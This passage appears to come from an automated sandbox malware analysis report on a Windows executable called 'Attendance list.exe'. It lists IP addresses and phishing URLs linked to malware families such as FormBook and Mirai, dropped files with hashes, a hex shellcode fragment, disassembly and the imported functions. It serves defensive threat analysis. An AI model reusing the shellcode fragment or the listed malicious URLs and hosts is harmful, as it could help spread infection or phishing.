                      mirai.mips.elfGet hashmaliciousMiraiBrowse
                      • 162.159.162.231
                      mirai.mpsl.elfGet hashmaliciousMiraiBrowse
                      • 1.2.57.176
                      https://docs.google.com/forms/d/e/1FAIpQLSdxwlJ42E7IP7P7FI5J10LvcZM2xU4rjZus8shJYViiMODIbA/viewform?pli=1Get hashmaliciousUnknownBrowse
                      • 104.21.82.77
                      https://scanner.topsec.com/?d=3744&r=auto&u=https%3A%2F%2Fmaknastudio.com%2Fpkyos&t=a4fe2e96fe6815a71cc8a7f1ae1196e6fbcf1f08Get hashmaliciousHTMLPhisherBrowse
                      • 172.64.151.101
                      https://app.smartsheet.com/b/download/att/1/4551989320961924/a9qsrcukwyvga6dsz82rixnmpgGet hashmaliciousHTMLPhisherBrowse
                      • 104.17.2.184
                      [EXTERNAL] Action Required_ ACH Remittance Review AbrholdingsGet hashmaliciousUnknownBrowse
                      • 172.67.179.83
                      http://url.usb.m.mimecastprotect.com/s/SPnzCDwVznT7kyA0HkOsZj?domain=linkscan.ioGet hashmaliciousHTMLPhisherBrowse
                      • 104.17.2.184
                      Details.exeGet hashmaliciousSnake KeyloggerBrowse
                      • 188.114.96.3
                      https://f8dde4bf9.skcrr.com/s/bb134f99?b3c4b4af7cc5=c3UuY2FpQHJvcy5jb20=Get hashmaliciousUnknownBrowse
                      • 104.21.16.234
                      VPSQUANUSAWB 112-17259653.exeGet hashmaliciousFormBookBrowse
                      • 198.44.170.208
                      Rn1AkuRExh.elfGet hashmaliciousMiraiBrowse
                      • 103.252.20.91
                      c5018a3915e8a9de41e083f7936c2d232b9a73ba41c8c07fb7b2d90d5f5d8e8e_dump.exeGet hashmaliciousSystemBCBrowse
                      • 198.44.190.49
                      tpwinprn.dllGet hashmaliciousGhostRatBrowse
                      • 156.235.99.47
                      6z70AuHrHI.dllGet hashmaliciousUnknownBrowse
                      • 156.235.99.47
                      PI No. LI-4325.scr.exeGet hashmaliciousFormBookBrowse
                      • 156.235.111.63
                      2OdHcYtYOMOepjD.exeGet hashmaliciousFormBookBrowse
                      • 23.251.54.212
                      Tekstlinie.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                      • 23.251.54.212
                      Liquidacion por Factorizacion de Creditos.exeGet hashmaliciousFormBook, GuLoaderBrowse
                      • 107.151.241.58
                      Purchase order.pdf.exeGet hashmaliciousFormBookBrowse
                      • 23.251.54.212
                      PROVIDERBOXIPv4IPv6DUS1DE62c.jsGet hashmaliciousUnknownBrowse
                      • 5.44.111.28
                      62c.jsGet hashmaliciousUnknownBrowse
                      • 5.44.111.28
                      z8s945rPmZ.exeGet hashmaliciousSystemBCBrowse
                      • 5.44.111.104
                      JJUmnnkIxSCyKik.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                      • 93.90.186.43
                      De0RycaUHH.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, StealcBrowse
                      • 5.44.111.109
                      27i42a6Qag.exeGet hashmaliciousGlupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoaderBrowse
                      • 128.127.69.76
                      Wp2jiU6tOK.elfGet hashmaliciousMiraiBrowse
                      • 5.44.126.213
                      tSPx13a2fq.elfGet hashmaliciousMirai, MoobotBrowse
                      • 5.44.126.228
                      Product_Inquiry_#03_2023.exeGet hashmaliciousUnknownBrowse
                      • 5.44.111.13
                      Advanced_Payment_Copy.exeGet hashmaliciousUnknownBrowse
                      • 5.44.111.13
                      LOOPIASENavana Pharmaceuticals PLC.pdf.exeGet hashmaliciousFormBookBrowse
                      • 194.9.94.85
                      Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                      • 194.9.94.86
                      Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                      • 194.9.94.85
                      Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                      • 194.9.94.85
                      TKHA-A88163341B.bat.exeGet hashmaliciousFormBookBrowse
                      • 194.9.94.85
                      ORDER TKHA-A88163341B.bat.exeGet hashmaliciousFormBookBrowse
                      • 194.9.94.85
                      c5018a3915e8a9de41e083f7936c2d232b9a73ba41c8c07fb7b2d90d5f5d8e8e_dump.exeGet hashmaliciousSystemBCBrowse
                      • 93.188.3.13
                      D7KV2Z73zC.rtfGet hashmaliciousFormBookBrowse
                      • 194.9.94.85
                      Scan Doc.docx.docGet hashmaliciousFormBookBrowse
                      • 194.9.94.85
                      file.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
                      • 93.188.3.11

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Temp\23802I71

                      Download File
                      Process:C:\Windows\SysWOW64\clip.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\Vevine

                      Download File
                      Process:C:\Users\user\Desktop\Attendance list.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):270848
                      Entropy (8bit):7.994162077855672
                      Encrypted:true
                      SSDEEP:6144:/g2NQUrgeNCOMb4UHwJewxix9RcqOsUSTQEs7OoAGD:/vBNr7UQJbxiiqxsKDa
                      MD5:39EC39B1818CDB59822D3D0A2E49177F
                      SHA1:24714A4B114C601DE4871159A7237DDD7B015790
                      SHA-256:D2F5EF08E29A0F4A6058E54A5725182E0525E7B7E6C20477C4665DCEEFB7AFED
                      SHA-512:7A26EA5D9B3CB6B47AC5E689161C4A33D85D13B6F9866A2568887C4B804053C59F465C09EC564F1A5C3805F2D9BE647316E1F05C117EC49575DFC0ACAD28090D
                      Malicious:false
                      Reputation:low
                      Preview:..vb.JL8Fj.._...h.0G...n1O..NTST30DJL8F2G3VKNTST30DJL8F2G3.KNT]K.>D.E.g.F..j.<:'.@6%+J'_gP7% ;'tQUd89Vf[)....t>;WUjGA2b2G3VKNT*U:.y*+.{R .k+).I..~*+.\...j+).I..x*+..[$[k+).ST30DJL8.wG3.JOTB..PDJL8F2G3.KLUXU80DZH8F2G3VKNTsA30DZL8F.C3VK.TSD30DHL8@2G3VKNTUT30DJL8F.C3VINTST30FJ..F2W3V[NTST#0DZL8F2G3FKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNT} VH0JL8.=C3V[NTSD70DZL8F2G3VKNTST30dJLXF2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8

                      C:\Users\user\AppData\Local\Temp\adstipulator

                      Download File
                      Process:C:\Users\user\Desktop\Attendance list.exe
                      File Type:ASCII text, with very long lines (28756), with no line terminators
                      Category:dropped
                      Size (bytes):28756
                      Entropy (8bit):3.5862559753336423
                      Encrypted:false
                      SSDEEP:768:miTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbX+IZ6Gg4vfF3if6gyHs:miTZ+2QoioGRk6ZklputwjpjBkCiw2Ru
                      MD5:042C77DB25CE7978F76E0218114AE8BF
                      SHA1:E1107C7B56E1547B9AFB50C07F02813A06E37551
                      SHA-256:296D97C0711B95BAD3DF9567BFED2585F712DAACEB8A67B7600C5F2A120C87DA
                      SHA-512:B68F3E9557FB4728F77124232C1C41AA11C7FFB0317BE4DC57EC273A1768ABB95E690FA0415D00F464BD0A913C6D8046C6AF62007EA620ADE091AD2289AEFF3F
                      Malicious:false
                      Reputation:low
                      Preview:8D6804F867D7E3ED21599F86932DA5673082A29A59B06B261C54E6F1DF089BBB368C973697738FDC880x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffff

                      C:\Users\user\AppData\Local\Temp\aut6F8D.tmp

                      Download File
                      Process:C:\Users\user\Desktop\Attendance list.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):270848
                      Entropy (8bit):7.994162077855672
                      Encrypted:true
                      SSDEEP:6144:/g2NQUrgeNCOMb4UHwJewxix9RcqOsUSTQEs7OoAGD:/vBNr7UQJbxiiqxsKDa
                      MD5:39EC39B1818CDB59822D3D0A2E49177F
                      SHA1:24714A4B114C601DE4871159A7237DDD7B015790
                      SHA-256:D2F5EF08E29A0F4A6058E54A5725182E0525E7B7E6C20477C4665DCEEFB7AFED
                      SHA-512:7A26EA5D9B3CB6B47AC5E689161C4A33D85D13B6F9866A2568887C4B804053C59F465C09EC564F1A5C3805F2D9BE647316E1F05C117EC49575DFC0ACAD28090D
                      Malicious:false
                      Reputation:low
                      Preview:..vb.JL8Fj.._...h.0G...n1O..NTST30DJL8F2G3VKNTST30DJL8F2G3.KNT]K.>D.E.g.F..j.<:'.@6%+J'_gP7% ;'tQUd89Vf[)....t>;WUjGA2b2G3VKNT*U:.y*+.{R .k+).I..~*+.\...j+).I..x*+..[$[k+).ST30DJL8.wG3.JOTB..PDJL8F2G3.KLUXU80DZH8F2G3VKNTsA30DZL8F.C3VK.TSD30DHL8@2G3VKNTUT30DJL8F.C3VINTST30FJ..F2W3V[NTST#0DZL8F2G3FKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNT} VH0JL8.=C3V[NTSD70DZL8F2G3VKNTST30dJLXF2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8F2G3VKNTST30DJL8

                      C:\Users\user\AppData\Local\Temp\aut6FBD.tmp

                      Download File
                      Process:C:\Users\user\Desktop\Attendance list.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):9814
                      Entropy (8bit):7.602618158290456
                      Encrypted:false
                      SSDEEP:192:65jwEiq+uHKrLM0IltC6jQqSa6fYHToxycOIyYpgijSWzKrBSi/1aF:I6q+Brw/gjYKycW0gUMB//1I
                      MD5:2F712A00DD6B064B388C34F844EA7A0E
                      SHA1:35F3D0265D2A5FEA5F2C82A076716B9CA1B4B98D
                      SHA-256:7301D5D56B9A93F1EDBD5E4140221EA2F2B25CB7A56EA07EDCCB425D5C896326
                      SHA-512:A7DD30866507F4FCA0F2F6EAEEFE67E6866978CB19523CD9B36FCBCA1BD7C0AAB3820EAC80F7EAC8998D7F0E72126784D48B5A51FD2288238DA8DF2896E7D1F4
                      Malicious:false
                      Reputation:low
                      Preview:EA06..pT.Q&...8.M.z,.D.Lf....y9......o3.N&T...5...j..m1..f.Y..cD.L'.....3.N(s...m9...s.5..8.L/.Y...e..&6[...0.L..I..k7.N&. ..a0.M.....q4.Nf.P.....K..d.%...p.lY@.......c.Xf.0.o..b.L.`...,@. ...3+..d....s4.l&..........|....sa...`.........Y&.K0.....-vs5.M..2...N&.I...@.>..........$.0...fx. ..$l...I...#..$6...... ..... .Z...a.5..&.).....L.j.;$....M.j.;$....X@j.;%....Y@j.;,.....j.e.|f #^...j......l.....l.5....>0..Xf....M.^....$zn.....G..I....C...M.|........}S{....7...| l..P..........0...`>;..c7.6..{......=..7..............6,......b...,S ...i5.M.4.b..i|v)....b.h.,@..%........9....c...|3Y..h......._......@.>K...,v[..q5.M,.@..i7.X......9....2.......,.`....3.,.i8........}.k(.f..@..M&V....7.,.x....&.......0.......Fh...Fb.....3.."a9...`....,vb.....cd.X..P.Fl.Y.$..c. ....I...d..f.!...,vd......8..P.......0.....2...y...D.......c.0.......b.<NA...NM..;4.X.q1..&@Q..B.Y.ah......Yl.i..."..Bvj.........ic..'3Y..'f.....,j.1........C.`....7b.., .p..T.......Y,Vi......@

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.145716661459288
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:Attendance list.exe
                      File size:1'193'472 bytes
                      MD5:8a08778411f99d8db7790cb7f0a84e3b
                      SHA1:374833b2a846feb5c015f0ffcf44320a62ffa697
                      SHA256:fd8e19c88440f8e813686b5b91c2df082c0d319af7ff6a10056e27c5400228fe
                      SHA512:1f0a8c3e3ec10b4f00a1a84493e75fdcde0f625577f8022e6f3045096e956407d282a6438e4f9a40519041a094384124866b4b9e23cf379d7a910a258f10a9f5
                      SSDEEP:24576:lAHnh+eWsN3skA4RV1Hom2KXMmHawY3axThttc5:Uh+ZkldoPK8YawA8Tht8
                      TLSH:BD45AD0273D1C036FFABA2739B6AF60556BC78654123852F13981DB9BD701B2263E763
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

                      File Icon

                      Icon Hash:aaf3e3e3938382a0

                      Static PE Info

                      General

                      Entrypoint:0x42800a
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                      Time Stamp:0x6683370B [Mon Jul 1 23:08:59 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:1
                      File Version Major:5
                      File Version Minor:1
                      Subsystem Version Major:5
                      Subsystem Version Minor:1
                      Import Hash:afcdf79be1557326c854b6e20cb900a7

                      Entrypoint Preview

                      Instruction
                      call 00007F3574D5E30Dh
                      jmp 00007F3574D510C4h
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      push edi
                      push esi
                      mov esi, dword ptr [esp+10h]
                      mov ecx, dword ptr [esp+14h]
                      mov edi, dword ptr [esp+0Ch]
                      mov eax, ecx
                      mov edx, ecx
                      add eax, esi
                      cmp edi, esi
                      jbe 00007F3574D5124Ah
                      cmp edi, eax
                      jc 00007F3574D515AEh
                      bt dword ptr [004C41FCh], 01h
                      jnc 00007F3574D51249h
                      rep movsb
                      jmp 00007F3574D5155Ch
                      cmp ecx, 00000080h
                      jc 00007F3574D51414h
                      mov eax, edi
                      xor eax, esi
                      test eax, 0000000Fh
                      jne 00007F3574D51250h
                      bt dword ptr [004BF324h], 01h
                      jc 00007F3574D51720h
                      bt dword ptr [004C41FCh], 00000000h
                      jnc 00007F3574D513EDh
                      test edi, 00000003h
                      jne 00007F3574D513FEh
                      test esi, 00000003h
                      jne 00007F3574D513DDh
                      bt edi, 02h
                      jnc 00007F3574D5124Fh
                      mov eax, dword ptr [esi]
                      sub ecx, 04h
                      lea esi, dword ptr [esi+04h]
                      mov dword ptr [edi], eax
                      lea edi, dword ptr [edi+04h]
                      bt edi, 03h
                      jnc 00007F3574D51253h
                      movq xmm1, qword ptr [esi]
                      sub ecx, 08h
                      lea esi, dword ptr [esi+08h]
                      movq qword ptr [edi], xmm1
                      lea edi, dword ptr [edi+08h]
                      test esi, 00000007h
                      je 00007F3574D512A5h
                      bt esi, 03h

                      Rich Headers

                      Programming Language:
                      • [ASM] VS2013 build 21005
                      • [ C ] VS2013 build 21005
                      • [C++] VS2013 build 21005
                      • [ C ] VS2008 SP1 build 30729
                      • [IMP] VS2008 SP1 build 30729
                      • [ASM] VS2013 UPD5 build 40629
                      • [RES] VS2013 build 21005
                      • [LNK] VS2013 UPD5 build 40629

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0xbc0cc0x17c.rdata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x58f9c.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1210000x7134.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa4b500x40.rdata
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000x8dfdd0x8e000310e36668512d53489c005622bb1b4a9False0.5735602580325704data6.675248351711057IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rdata0x8f0000x2fd8e0x2fe00748cf1ab2605ce1fd72d53d912abb68fFalse0.32828818537859006data5.763244005758284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .data0xbf0000x8f740x5200aae9601d920f07080bdfadf43dfeff12False0.1017530487804878data1.1963819235530628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc0xc80000x58f9c0x590006e5a53c1a6bd27e7b795f4181821075dFalse0.9265438465589888data7.890603905752855IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc0x1210000x71340x7200f04128ad0f87f42830e4a6cdbc38c719False0.7617530153508771data6.783955557128661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                      Resources

                      NameRVASizeTypeLanguageCountryZLIB Complexity
                      RT_ICON0xc85a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                      RT_ICON0xc86d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                      RT_ICON0xc87f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                      RT_ICON0xc89200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                      RT_ICON0xc8c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                      RT_ICON0xc8d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                      RT_ICON0xc9bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                      RT_ICON0xca4800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                      RT_ICON0xca9e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                      RT_ICON0xccf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                      RT_ICON0xce0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                      RT_MENU0xce4a00x50dataEnglishGreat Britain0.9
                      RT_STRING0xce4f00x594dataEnglishGreat Britain0.3333333333333333
                      RT_STRING0xcea840x68adataEnglishGreat Britain0.2747909199522103
                      RT_STRING0xcf1100x490dataEnglishGreat Britain0.3715753424657534
                      RT_STRING0xcf5a00x5fcdataEnglishGreat Britain0.3087467362924282
                      RT_STRING0xcfb9c0x65cdataEnglishGreat Britain0.34336609336609336
                      RT_STRING0xd01f80x466dataEnglishGreat Britain0.3605683836589698
                      RT_STRING0xd06600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                      RT_RCDATA0xd07b80x50264data1.0003381136305485
                      RT_GROUP_ICON0x120a1c0x76dataEnglishGreat Britain0.6610169491525424
                      RT_GROUP_ICON0x120a940x14dataEnglishGreat Britain1.25
                      RT_GROUP_ICON0x120aa80x14dataEnglishGreat Britain1.15
                      RT_GROUP_ICON0x120abc0x14dataEnglishGreat Britain1.25
                      RT_VERSION0x120ad00xdcdataEnglishGreat Britain0.6181818181818182
                      RT_MANIFEST0x120bac0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                      Imports

                      DLLImport
                      WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                      VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                      COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                      MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                      WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                      PSAPI.DLLGetProcessMemoryInfo
                      IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                      USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                      UxTheme.dllIsThemeActive
                      KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                      USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, 